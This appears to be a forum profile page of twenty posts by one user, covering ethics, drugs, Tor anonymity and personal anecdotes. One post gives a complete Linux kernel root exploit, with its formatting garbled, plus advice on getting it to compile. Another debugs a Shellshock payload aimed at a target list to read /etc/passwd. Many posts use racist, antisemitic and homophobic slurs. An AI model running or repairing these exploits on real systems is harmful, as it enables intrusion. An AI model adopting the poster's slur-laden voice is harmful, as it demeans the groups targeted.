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Posts by Lanny

  1. Lanny Bird of Courage
    I agree with the idea that animals and infants, under the appropriate circumstances, may have comparable moral statuses. If you wanted to run the thought experiment in reverse you could say that there are extreme cases of infants alive today without the potential to exceed the cognitive capacity of farm animals and I'm sure a lot of people would give brain damaged infants some level of worth (minimally no one would condone killing them for mild transient pleasures).

    But I'd argue we need to bite the bullet in a different direction. Instead of trying to deny the moral capacity of animals with potential for human-like minds we should accept that killing animals with potential for human-like minds is wrong. And I'd argue that mammalian farm animals show significant signs of human-like minds in all the appropriate dimensions, specifically hedonic capacity. The answer to the dilemma presented is vegetarianism rather than infanticide. By the same maxim that killing human children below a certain age barring extenuating circumstances is impermissible so is modern animal farming.
  2. Lanny Bird of Courage
    Lol, I've had this thread open for like 3 days being like "shit, how do I reply to that" and literally just read far enough to realize it was an eminem gag. God damnit. I was even like "I should write 'maybe Delores would go over better'."

    Also I think I was like 7 or something when that song was getting radio play.
  3. Lanny Bird of Courage
    Take the UCLA Loneliness Scale test:

    The average score for college students is 20.

    Scored a 17, aww yeah, take that average college student. It occurs to me that you could score very low just by "being a loner" or not having a particularly strong desire for human interaction. Not that I fit that description but if you had given me this test when I was 16 or something I would have had a similar score but have actually had a much lower level of social interaction, much more isolated, it's just whether or not you feel "starved for company" is based on your self assessment of what the appropriate level of company is
  4. Lanny Bird of Courage
    It's not necessarily something you should feel guilty about, at least the former:

    After-Birth Abortion
    The pro-choice case for infanticide.

    I actually do think infanticide is acceptable in some cases but I think infanticide is a good example of why Judith Jarvis Thomson's position breaks down in the limit (her position being that a woman's autonomy over her body trumps most other moral considerations in allowing or barring abortion which I disagree with for other reasons. I'm closer to Singer's position although disagree with him as well.). Thomson's argument, I contend, sets the stage for infanticide pretty clearly even if she backs out of that particular extrapolation (I'm not sure if it was in a published paper but her position is that born infants have some kind of derived value by way of their parents, like art has value because we enjoy it or something, which is really pretty weak). At the end of her paper where she makes the famous violinist argument she contends she hasn't make an argument that all cases of abortion are permissible but it's a broad enough umbrella that (and we've seen this) it's gleefully taken up by pro-choice activists. The fact that it breaks down (or requires these stretched post-hoc explanations rather than just biting the bullet) shows, I think, why the argument is flawed in the first place.
  5. Lanny Bird of Courage
    I didn't try on linux proper but I was able to compile (with warnings but whatever) by adding some defines:

    #include <sys/types.h>
    #include <sys/wait.h>
    #include <sys/ptrace.h>
    #include <inttypes.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/mman.h>
    #include <string.h>

    #define ORIG_RAX 15
    #define PTRACE_SYSCALL 24
    #define PTRACE_DETACH 17
    #define PTRACE_POKEUSER 6
    #define PTRACE_PEEKUSER 3
    #define PTRACE_TRACEME 0
    #define MAP_ANONYMOUS 0x0800

    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;

    int kernelmodecode(void *file, void *vma)
    return -1;

    unsigned long
    get_symbol(char *name)
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    int ret = 0, oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
    f = fopen("/proc/ksyms", "r");
    if (f == NULL)
    return 0;
    oldstyle = 1;

    while (ret != EOF) {
    if (!oldstyle) {
    ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
    } else {
    ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
    if (ret == 2) {
    char *p;
    if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
    p = strrchr(sname, '_');
    if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
    p = p - 4;
    while (p > (char *)sname && *(p - 1) == '_') {
    *p = '\0';
    if (ret == 0) {
    fscanf(f, "%s\n", sname);
    if (!strcmp(name, sname)) {
    printf("resolved symbol %s to %p\n", name, (void *) addr);
    return addr;

    return 0;

    static void docall(uint64_t *ptr, uint64_t size)
    commit_creds = (_commit_creds) get_symbol("commit_creds");
    if (!commit_creds) {
    printf("symbol table not available, aborting!\n");

    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
    printf("symbol table not available, aborting!\n");

    uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

    printf("mapping at %lx\n", tmp);

    if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
    printf("mmap fault\n");

    for (; (uint64_t) ptr < (tmp + size); ptr++)
    *ptr = (uint64_t)kernelmodecode;

    "\tmovq $0x101, %rax\n"
    "\tint $0x80\n");

    printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
    execl("/bin/sh", "bin/sh", NULL);
    printf("no /bin/sh ??\n");

    int main(int argc, char **argv)
    int pid, status, set = 0;
    uint64_t rax;
    uint64_t kern_s = 0xffffffff80000000;
    uint64_t kern_e = 0xffffffff84000000;
    uint64_t off = 0x0000000800000101 * 8;

    if (argc == 4) {
    docall((uint64_t*)(kern_s + off), kern_e - kern_s);

    if ((pid = fork()) == 0) {
    ptrace(PTRACE_TRACEME, 0, 0, 0);
    execl(argv[0], argv[0], "2", "3", "4", NULL);
    perror("exec fault");

    if (pid == -1) {
    printf("fork fault\n");

    for (;;) {
    if (wait(&status) != pid)

    if (WIFEXITED(status)) {
    printf("Process finished\n");

    if (!WIFSTOPPED(status))

    if (WSTOPSIG(status) != SIGTRAP) {
    printf("Process received signal: %d\n", WSTOPSIG(status));

    rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
    if (rax == 0x000000000101) {
    if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
    printf("PTRACE_POKEUSER fault\n");
    set = 1;
    //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);

    if ((rax == 11) && set) {
    ptrace(PTRACE_DETACH, pid, 0, 0);

    if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
    printf("PTRACE_SYSCALL fault\n");

    return 0;

    which I just found from googling against glibc. I don't have them because I'm trying this on OSX with clang but you should have gotten it from your includes. Your prompt says kali but you mentioned visual studio. You are trying to compile this on kali or some other linux distro right? All these constants are for linux process stuff so there's no chance of building this on a windows machine.

    Anyway, try the defines (start with just the ORIG_RAX one and only add the rest if it complains about it) and let us know what it does
  6. Lanny Bird of Courage
    Ok nigger since you're awol i did some research on all special shell characters in bash i am escaping them all and asked on stack overflow but you know how those niggers get. Anyway, new code:

    `cat $list | xargs curl -H \"custom:\(\) \{ ignored; \}\; echo Content-Type: text/html\; echo \; /bin/cat /etc/passwd | printf %b \n`

    This is the output from curl:

    curl: (3) [globbing] unmatched brace at pos 2
    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed
    0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0curl: (6) Could not resolve host: ignored
    100 12037 0 12037 0 0 10421 0 --:--:-- 0:00:01 --:--:-- 19254
    100 5722 0 5722 0 0 6113 0 --:--:-- --:--:-- --:--:-- 8341

    Also see how it's attempting to resolve the host "ignored" that's bullshit and not what i want i want xargs to pass a url as the first argument to curl, why is it not doing that?

    But that's not all i get error messages as well, see the following.

    $ line 32: };: command not found
    $ line 32: !DOCTYPE: command not found

    bby pls, i need you so much right nao ;_;

    Different problem here, the escaping wasn't your problem to start with but it's causing problems here. Consider the following commands:

    [lanny:~]$ echo "foobar"                                                       
    [lanny:~]$ echo \"foobar\"

    So normally your shell uses the double quote to indicate the start of a string, meaning any spaces following it are not to be treated as additional arguments so like `echo foo bar` invokes echo with two arguments while `echo "foo bar"` invokes it with one. When you escape a double quote (put a \ in front of it) it means "this is literally a backquote, it has no meaning to you (the shell)". So when you do `curl -H "custom:\(\)` you're saying invoke curl with two arguments, the second of which is literally:

    [lanny:~]$ echo \"custom:\(\) | hexdump                                        
    0000000 22 63 75 73 74 6f 6d 3a 28 29 0a

    so the first byte of the second argument is 0x22 or the quote character under ascii/utf-8. This causes problems because the next semi-colon is read as a special character in bash, it's says "execute the command on the left of the semicolon, and then the one on the right" a lot like "&&" does except "&&" requires the first command to exit normally, otherwise it won't run the next command.Anyway, this means your shell will try to run "curl -H "custom:\(\) \{ ignored" which may or may not be a valid invocation of curl and then it's going to try to run the "{;" command which I don't think is a thing.
  7. Lanny Bird of Courage
    I would be down for the whole foods thing in an instant if it weren't an obvious scam. Hate to call a nigga out but without at least putting in the effort of some samples you're not going to do very well with a cut and run scam.
  8. Lanny Bird of Courage

    I'm genuinely surprised that's a thing.
  9. Lanny Bird of Courage
    As a verified quasi-tranny I'm qualified to say the way you represent yourself online is decidedly masculine. No idea what you're like IRL beyond your videos which, again, don't seem particularly feminine. Do you want cross dress? Do you want to be a woman? I think the "man with feminine sensibilities" phenomenon is generally more common if only because it's more socially acceptable.

    Just do what you want to do (wo)mang, if cross dressing is your thing then go for it, if you just like floral displays then what the fuck, might as well enjoy some floral displays and fuck anyone who disagrees.
  10. Lanny Bird of Courage
    Mind me asking about that hobby project? In my case I feel that doing something like this would realize a desire to produce something I am proud of, something that would genuinely solve someone's problems. I think Ive had bad luck as all the places Ive worked at pushed for tight deadlines and after a short while I began to hate my job because it put severe constraints on my work - I could never make something that I'm proud of, only things that looked nice but barely worked.

    Know it's been a long ass time since this post was made but on the off chance you're still around it was a cryptography scheme for email that would make subpoenas generally ineffective. Kinda like hushmail but technically better (at the cost of some corner cases being (maybe) unintuitive). It was really fun because I got to implement crypto in javascript which actually worked (despite that being, in general, a bad idea) and tackle a whole host of other interesting but solvable problems (I ended up writing this whole parser-generation framework which served in interpreting emails and email addresses (ironically the RFC specifying an email address grammar (which basically everyone ignores) is far more complicated than the RFC specifying email grammar))). The plan was, more or less, to store public keys for users and encrypt email on receipt before storage which is fairly simple but has a surprising number of complicating cases and pitfalls. It would make providing plaintext records to LEO impossible and thus subpoenas (in the traditional sense of a request for data at a given point in time) useless. We started the project shortly after the Snowden/lavabit thing in an effort to "replace" lavabit (defunct) with something better.

    I'm in college and not content with working for a dim-witted boss for the next 20 years in the hopes I move up the corporate ladder… If anyone wants to start a business, hit me up. I'm more than capable of giving 110% if it's viable. I'm interested in finance and stock market stuff, but also anything that's profitable. Seems like there are already some great ideas being thrown out there.

    This feels like a joke post. I think this is a joke post. Is this a joke post?
  11. Lanny Bird of Courage
    I don't consume a lot of news media but for whatever reason I was browsing r/sanfrancisco a little while ago (I know you read this sub sometimes malice, you were the first person I've seen link it) and like half the posts were about murders or rapes or random acts of violence. Going off this shit I'd be fucking terrified to step out of my house. Like a day or two ago I was making a greek salad and realized I didn't have feta. I was kinda drunk at the time so I grabbed my wallet and keys and went down to the nearest store a couple of blocks away to buy some. This was at like 1 in the morning and I was wearing an undershirt and jeans (and I look very white in a not-so-white area) and after a block or two of walking I started to feel kinda exposed, lots of drunks and homeless around, the idea of getting mugged was in my mind. I got to the store, bought my cheese, and on the way back I realized I've been mugged twice since moving up (~5 years ago) here which is kinda high relative to friends which has ended up costing me like a grand total of $30 and less than 20 minutes of my life. Like on this one walk, of the two randos who I interacted with, one wished me a happy holidays and the other asked me for spare change. I live in what's considered to be the most "dangerous" neighborhood in SF. This doesn't even approach the level of "danger" people make out like. I guess it's just an issue of not being evolved to deal with numbers, stats, relative probabilities that make exceptional cases of violence seem imminent but it's sometimes amazing how people will blow things out of proportion. But I guess it's not surprising if the media you consume is all about the worst examples of behaviour we can find in our society. I guess it's hard to write a good news article about how yuppie faggots like me can go get fetta at 1 in the morning without issue but it seems legitimately damaging to occupy your cognitive time with the most negative microtesmial portion of occurring events in a given area.

    Weed didnt cause her to miscarry. I smoked a lot of weed through my entire pregnancy (due to being violently ill if I didnt), among other things and my baby is perfectly healthy and happy.

    So I obviously have no reason to think weed could cause a miscarriage but in personal experience every time I try to use it as an anauseant I end up feeling like total shit. Like I still feel like I need to throw up but can't and end up doing it while wishing I could just so I could be done with the feeling of needing to. Again, not something I think would kill or harm a fetus but I just never understood people who use weed as a treatment for nauseating conditions.
  12. Lanny Bird of Courage
    It's just a question of if executive function is preserved in the "rewind". Like there are a lot of things that go into our decision making that don't involve memories (genetic predisposition for things like addiction of example) so just erasing a person's memories likely would produce different actions than previously. But if we just assume you revert to a previous total mental state then sure, I'd argue it would be logically contradictory to make a different set of decisions. But even the alternative, the idea that identical initial conditions can produce different terminal states, doesn't permit the thing we generally think of when we talk about free will.
  13. Lanny Bird of Courage
    I guess it depends on what you take "totally anonymous" to mean. If we take anonymity to mean lacking identity then the answer is sure, tor (and only tor) is anonymous under the assumption asymmetric encryption exists (which we can take for granted, if the opposite is true then our world would be so radically different the last thing you need to worry about is the feds). Almost everything that runs on top of tor is not anonymous, because things don't really work without identity. But anonymity isn't what you care about when you're selling drugs right? Everyone knew who DPR was, he had an identity (the account) but ran SR with impunity and could have indefinitely if technical considerations were the only thing involved. Pseudonymity is what people usually mean when they talk about anonymity, which is divorcing one identity from another.

    Like imagine you have one of those tin can/string phones or whatever. Assuming the other end is out of sight you can't possible know who's on the other side, they're anonymous. Once they start talking through they could tell you their name, you might deduce who they are by their voice, so on and so forth. It would be fair to say tor is anonymous, and that tails/torbrowser make efforts to be pseudonymous (such that your real identity can not be connected to your identity wrt a given site) and are generally successful (although there are high profile examples of failure in this department).

    The "nothing is 100% anonymous" response is bit of a cop out. Firstly it's trivial to imagine situations with provably true anonymity (dead drops (ignoring location exchange) are a physical example with digital analogs) although they're not usually of much use and secondly there's a huge range of mediums of communication that are not strictly anonymous.
  14. Lanny Bird of Courage
    It's the shit drug you try when you're 13 and smoked weed like maybe once before and have no real source for anything. At least that's the way I've always thought of it, though admittedly I haven't tried it in many years. Never felt particularly trippy to me, just made me feel stupid and uncoordinated like bottom shelf indica does except with hellish cotton mouth and an awkward onset/duration.
  15. Lanny Bird of Courage
    Seems pretty accurate to me.
  16. Lanny Bird of Courage
    I've been out of the loop for a while but weren't you going off to the military last I checked? In any case, if there's anything I can do to help you get access I'm happy to do it. Tor is slow as shit (I mean the site itself is show as shit, but tor is even slower). If it's a domain name enhancement on "nigga" I can grab one of my other joke-domains and point it at the same addr so there are no niggas, niggers, fagloards, kikes, spics, or niggercocks in the url if that's all it takes.
  17. Lanny Bird of Courage
    I knew, in the moment I typed the word "noumena" that someone was going to make some joke, basically this. All I can say at this point is "no I don't like that" and "I'm too drunk to work up the enthusiasm to reply to a joke post". Hey hey, maybe booze is a short term cure for autism. I could believe that, seems to fit pretty well too.
  18. Lanny Bird of Courage
    implying TPM didn't run the franchise a decade ago.

    I'm at least willing to give Abrams a chance. He can't save it at his point but if he can entertain me for 2~3 hours I'll call it a win.
  19. Lanny Bird of Courage
    I bet you two fags are jacking off to each other's pictures

    I could jack off to your picture as well if you like baby
  20. Lanny Bird of Courage
    Oh, and is this a selfie thread now? I want in

    I've been kicking around the idea of taking round-trip train rides on the same day for a little while. Like taking a train down to gilroy or something and catching the next train back up. For the last 5 years I've taken the train down to fresno for thanksgiving but I've found that I actually really enjoy the ride. Once you get out of oakland (poor black neighborhoods, trash and shit everywhere) and before you get into the central valley proper (poor mexicans, not particularly shitty but just suburban housing) there's a really pretty run of land along the inside of eastbay and south, hills and water and farms and shit. In particular the tracks run right by this sugar refinery that for whatever reason I think is one of the most beautiful structures I've ever seen:

    That ride is literally one of the most relaxing experiences I've ever had, just staring out the window at the land rolling by. I find it's really ideal working conditions too, minimal distractions, comfortable, internet if I need reference material but it's too slow for me to do the things that usually distract me. Maybe it's just the association with thanksgiving, when I was a student it represented a break from work (although I never really felt a lot of stress from school) or seeing family (I'm on good terms with my family but I don't get particularly excited about seeing them). Probably sounds like a really stupid idea but I'm tempted to do it, I mean tickets are pretty cheap.
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